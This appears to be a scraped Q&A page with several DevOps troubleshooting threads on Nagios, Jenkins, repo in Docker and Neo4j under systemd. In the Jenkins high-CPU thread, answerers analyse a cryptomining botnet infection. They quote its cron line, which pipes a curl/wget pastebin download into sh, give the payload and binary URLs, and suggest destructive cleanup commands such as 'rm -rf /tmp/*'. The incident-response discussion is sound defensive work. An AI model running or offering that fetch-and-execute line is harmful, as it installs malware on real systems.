Nagios return status unknow - monitoring

I install Nagios on CentOS to monitor some servers, and one of them is a TSM server.
I download a plugin written in bash when i execute it in command line it works.
/usr/lib64/nagios/plugins/check_tsm db -v6
db - database utilization 42%, OK
and the return code of the batch script is 0 ( from the command echo $? )
So the script work fine, and return 0 that mean a OK status in nagios, but the status still unknown, I really don't know why.
And i check logs in nagios, etc. It's not a problem of commands definition in commands.cfg or the declaration of service, because I copy the command that nagios send automatically every 5 min and the command works fine in command line, but still unknow status.
Definition of command:
define command{
command_name check_tsm_v6
command_line /usr/lib64/nagios/plugins/check_tsm $ARG1$ -v6 $ARG2$ $ARG3$
}
Service declaration :
define service{
use generic-service
host_name tsm-test
service_description database utilization
check_command check_tsm_v6!db!85!90
}
And here's the bash script.

One thing that's caught me out in the past with Nagios scripts is user rights. When testing your script directly on the command line be sure to precede it with:
sudo -u nagios
So yours would be:
sudo -u nagios /usr/lib64/nagios/plugins/check_tsm db -v6
This assumes that your nagios instance is being run by the nagios user, which is a fairly safe bet.
Good luck
Brad

Try to use yum install sysstat -y command to download the package.
If it work that will a great. If you are facing still same please upload the complete error which is showing in browser?

Related

Jenkins Job to run SOQL query

I'm trying to get a Jenkins job to run sfdx force:data:soql:query commands in order to migrate configuration data sets between our production org and our sandboxes after a refresh. Certain configurations do not persist on a refresh so we need a way to move that data.
Running the queries from the command line on the Jenkins server work as expected, however the job when it runs fails with the following error:
'C:\Program' is not recognized as an internal or external command, operable program or batch file.
Build step 'Execute shell' marked build as failure
The job does three things:
Authorizes to the DevHub, lists out the connected orgs, and then performs a SQOL query to just print some data - 16 lines to be exact. Here are the commands in the shell script of the job:
sfdx force:auth:jwt:grant -i ${CONNECTED_APP_CONSUMER_KEY} -u ${DEV_HUB} -f ${JENKINS_HOME}/certs/prod/server.key -r [...] -a DevHub
sfdx force:org:list
sfdx force:data:soql:query -u ${DEV_HUB} -q "SELECT Id, Name FROM [...tablename...]" -r human
I am completely stumped on why this is happening. Again, running the SOQL command directly on the server through PowerShell or Command Line works as expected. I would appreciate any help with this.
This one stumped me for a long time but we finally got it figured out.
If you are seeing this error, make sure to check your machine's environmental variables. I saw a TON of other answers pointing to this as the issue where the install of SFDX path name had spaces in it as in C:|P:rogram Files\SFDX\bin but only showed some weird command line FOR loop that made no sense what so ever.
What we did was to completely uninstall all of SFDX making sure none of it was left on the machine and reinstalled into a folder we made where there was no spaces in the path name.
Once we did that, our job worked like it was supposed to. I hope this helps others who run into this same issue.

Jenkins High CPU Usage Khugepageds

So the picture above shows a command khugepageds that is using 98 to 100 % of CPU at times.
I tried finding how does jenkins use this command or what to do about it but was not successful.
I did the following
pkill jenkins
service jenkins stop
service jenkins start
When i pkill ofcourse the usage goes down but once restart its back up again.
Anyone had this issue before?
So, we just had this happen to us. As per the other answers, and some digging of our own, we were able to kill to process (and keep it killed) by running the following command...
rm -rf /tmp/*; crontab -r -u jenkins; kill -9 PID_OF_khugepageds; crontab -r -u jenkins; rm -rf /tmp/*; reboot -h now;
Make sure to replace PID_OF_khugepageds with the PID on your machine. It will also clear the crontab entry. Run this all as one command so that the process won't resurrect itself. The machine will reboot per the last command.
NOTE: While the command above should kill the process, you will probably want to roll/regenerate your SSH keys (on the Jenkins machine, BitBucket/GitHub etc., and any other machines that Jenkins had access to) and perhaps even spin up a new Jenkins instance (if you have that option).
Yes, we were also hit by this vulnerability, thanks to pittss's we were able to detect a bit more about that.
You should check the /var/logs/syslogs for the curl pastebin script which seems to start a corn process on the system, it will try to again escalated access to /tmp folder and install unwanted packages/script.
You should remove everything from the /tmp folder, stop jenkins, check cron process and remove the ones that seem suspicious, restart the VM.
Since the above vulnerability adds unwanted executable at /tmp foler and it tries to access the VM via ssh.
This vulnerability also added a cron process on your system beware to remove that as well.
Also check the ~/.ssh folder for known_hosts and authorized_keys for any suspicious ssh public keys. The attacker can add their ssh keys to get access to your system.
Hope this helps.
This is a Confluence vulnerability https://nvd.nist.gov/vuln/detail/CVE-2019-3396 published on 25 Mar 2019. It allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
Possible solution
Do not run Confluence as root!
Stop botnet agent: kill -9 $(cat /tmp/.X11unix); killall -9 khugepageds
Stop Confluence: <confluence_home>/app/bin/stop-confluence.sh
Remove broken crontab: crontab -u <confluence_user> -r
Plug the hole by blocking access to vulnerable path /rest/tinymce/1/macro/preview in frontend server; for nginx it is something like this:
location /rest/tinymce/1/macro/preview {
return 403;
}
Restart Confluence.
The exploit
Contains two parts: shell script from https://pastebin.com/raw/xmxHzu5P and x86_64 Linux binary from http://sowcar.com/t6/696/1554470365x2890174166.jpg
The script first kills all other known trojan/viruses/botnet agents, downloads and spawns the binary from /tmp/kerberods and iterates through /root/.ssh/known_hosts trying to spread itself to nearby machines.
The binary of size 3395072 and date Apr 5 16:19 is packed with the LSD executable packer (http://lsd.dg.com). I haven't still examined what it does. Looks like a botnet controller.
it seem like vulnerability. try look syslog (/var/log/syslog, not jenkinks log) about like this: CRON (jenkins) CMD ((curl -fsSL https://pastebin.com/raw/***||wget -q -O- https://pastebin.com/raw/***)|sh).
If that, try stop jenkins, clear /tmp dir and kill all pids started with jenkins user.
After if cpu usage down, try update to last tls version of jenkins. Next after start jenkins update all plugins in jenkins.
A solution that works, because the cron file just gets recreated is to empty jenkins' cronfile, I also changed the ownership, and also made the file immutable.
This finally stopped this process from kicking in..
In my case this was making builds fail randomly with the following error:
Maven JVM terminated unexpectedly with exit code 137
It took me a while to pay due attention to the Khugepageds process, since every place I read about this error the given solution was to increase memory.
Problem was solved with #HeffZilla solution.

How to run repo from a script inside a container in a jenkins job

I am unable to run repo non-interactively inside a container as part of a freestyle job.
It prompts for the user-name and email. I got round that by doing a git config --global inside the job.
But then it does the color test, and that hangs indefinitely.
Looking at the source code for repo I see this
if os.isatty(0) and os.isatty(1) and not self.manifest.IsMirror:
if opt.config_name or self._ShouldConfigureUser():
self._ConfigureUser()
self._ConfigureColor()
So, I ran the following inside the container:
python -C "import os; print os.isatty(0), os.isatty(1)"
and, sure enough, it printed out True True
Looking at the Jenkins log, it launches the container with --tty specified, and there seems no way to configure that option.
I can't find a bash option to force a script to be run in a non-interactive shell. If I put the above python line in a file and execute it with almost any combination of commands and options, it still prints out True True
The only way I see something different is if I use I/O redirection
bash <a.sh
which prints out False True - i.e. stdin is not a tty, and
bash <a.sh >a.log
which prints False False.
For a complex script, are there any problems using the bash <script approach?
Does anyone know any jenkins magic to prevent docker being launched using --tty?
I know that the --tty is the culprit. I built the container locally and ran the following
$ docker run repotest python -c "import os;print os.isatty(0), os.isatty(1)"
False False
$ docker run --tty repotest python -c "import os;print os.isatty(0), os.isatty(1)"
True True
Running Versions:
repo: 1.12.37 (per Ubuntu 16.04 apt-get)
Jenkins: 2.149
Cloudbees Docker Plugin: 1.7.3
Container base is ubuntu:xenial
I'm using the "Build inside a docker container" option.
To run bash script repo_script.sh "non-interactively", or more exactly speaking without having terminals associated with standard streams, you could run your script simply as
repo_script.sh < /dev/null 2>&1 | cat
assuming you want to see the output the way you would see it running simply as repo_script.sh. By piping the standard output and error to a different process the file descriptor appears as a pipe and not TTY to repo_script.sh. You could also direct output to a file, or even to /dev/null if you do not care about the output:
log_file=/dev/null
repo_script.sh < /dev/null > "${log_file}" 2>&1
Running the script as
bash < repo_script.sh | cat
might would work too, though it is very unorthodox and to my mind hackish way of running a script just to break the association of TTY to the standard input. From script engine point of view, it is different to read a script program from a file than from standard input (which typically, if it is a terminal, is not seekable), so there might be some subtle differences that could possibly bite you in unexpected ways. This way does not as clearly communicate your intention to the next person that need to understand your code, and may lead to partial hair loss in that person due to extraneous head scratching.
There is no need for any bash options, just using the output directions from within the interpreting shell as above described is an easy-to-comprehend, multi-platform compatible standard convention for changing the standard stream associations.
P.S. I think it should be enough for your repo script to just test if the standard input is a TTY. It looks to me like the author of that script did not think deeply enough there. There is simply no use waiting for input if you do not have terminal device associated with standard input, and you could determine that everything needs to run without user interaction from there or stop with an error if that is not possible.

fpm is not recognised if executing script with jenkins and ssh

I am trying to execute a script over ssh connexion with Jenkins. I am using the SSH plugin and it is well configured. I arrive to execute the first part of the script, but when I try to execute a fpm command it says:
fpm: command not found
If I connect to the instance and run the same script that I call via Jenkins it runs and there is no error (fpm is installed).
So, I have created a test like a script test.sh:
#!/bin/bash -x
fpm
but, with Jenkins, I get the same error: fpm: command not found, while if I execute it I get a normal "parameter needed":
Missing required -s flag. What package source did you want? {:level=>:warn}
Missing required -t flag. What package output did you want? {:level=>:warn}
No parameters given. You need to pass additional command arguments so that I know what you want to build packages from. For example, for '-s dir' you would pass a list of files and directories. For '-s gem' you would pass a one or more gems to package from. As a full example, this will make an rpm of the 'json' rubygem: `fpm -s gem -t rpm json` {:level=>:warn}
Fix the above problems, and you'll be rolling packages in no time! {:level=>:fatal}
What am I missing? Why it cannot find fpm if it is installed?
Make sure fpm is in /usr/bin..
It seems that the problem came because the fpm was installed in the /home/user2connect/bin/, and the command was not recognised. For fixing this I had to call it wit the whole path:
/home/user2connect/bin/fpm ...
I have chosen to reinstall the fpm using sudo, so now it works.

Error Running Neo4j with Systemd on Arch Linux

I've got neo4j installed on my arch linux setup, and am able to start the server manually (sudo neo4j start). However, when I try to start it using systemctl start neo4j, I get
Job for neo4j.service failed. See 'systemctl status neo4j.service' and
'journalctl -xn' for details.
Neither of the suggestions in the error message give anything helpful. I have /usr/lib/systemd/system/neo4j.service:
[Unit]
Description=Neo4j
[Service]
User=root
Type=forking
ExecStart=/usr/bin/neo4j start
ExecStop=/usr/bin/neo4j stop
PIDFile=/run/neo4j/neo4j-service.pid
#LimitNOFILE=40000
[Install]
WantedBy=multi-user.target
I've tried changing the User between neo4j and root, and I originally had LimitNOFILE not commented out, before I tried setting the limits in security/limits.conf (which got rid of the file number error when starting it normally). This setup is mentioned in the AUR, but I just can't get it working. Any help is appreciated!
I have just attempted to set up Neo4j on a fresh Arch VM and this has worked successfully. The steps I followed were:
Boot
Install wget and jdk7-openjdk by running pacman -S wget jdk7-openjdk
Download Neo4j package from the AUR using wget https://aur.archlinux.org/packages/ne/neo4j/neo4j.tar.gz
Unzip package with tar xvf neo4j.tar.gz
Change dir cd neo4j
Build package using makepkg (this downloads Neo4j from dist.neo4j.org)
Install with pacman -U neo4j-2.1.5-1-any.pkg.tar.gz
As per the messages received during installation, create configuration to point at the installed JDK:
mkdir /etc/systemd/system/neo4j.service.d
echo "[Service]" >> /etc/systemd/system/neo4j.service.d/java_home.conf
echo "Environment=JAVA_HOME=/usr/lib/jvm/default" >> /etc/systemd/system/neo4j.service.d/java_home.conf
Start the server with systemctl start neo4j.service
Check the server is running with curl http://localhost:7474/db/data/
If this works, a JSON response will be shown.
As I can't tell exactly the steps you went through to install or what your file system may look like, your best bet will probably be to compare the steps you went through with these above and see where the differences are.
At a guess, I'd recommend looking at your Java installation first to see if the service is having trouble finding the Java runtime. This is certainly the most fiddly part of the whole process.
Note: I used the JDK here but I don't see why the jre7-openjdk package should not work just as well.
Do you try to add this modified line for file /usr/lib/systemd/system/neo4j.service ?
[Unit]
Description=Neo4j
[Service]
User=neo4j
Type=forking
RuntimeDirectory=neo4j
RuntimeDirectoryMode=770
ExecStart=/usr/bin/neo4j start
ExecStop=/usr/bin/neo4j stop
ExecReload=/usr/bin/neo4j restart
RemainAfterExit=no
Restart=on-failure
PIDFile=/run/neo4j/neo4j-service.pid
LimitNOFILE=60000
TimeoutSec=600
[Install]
WantedBy=multi-user.target

Resources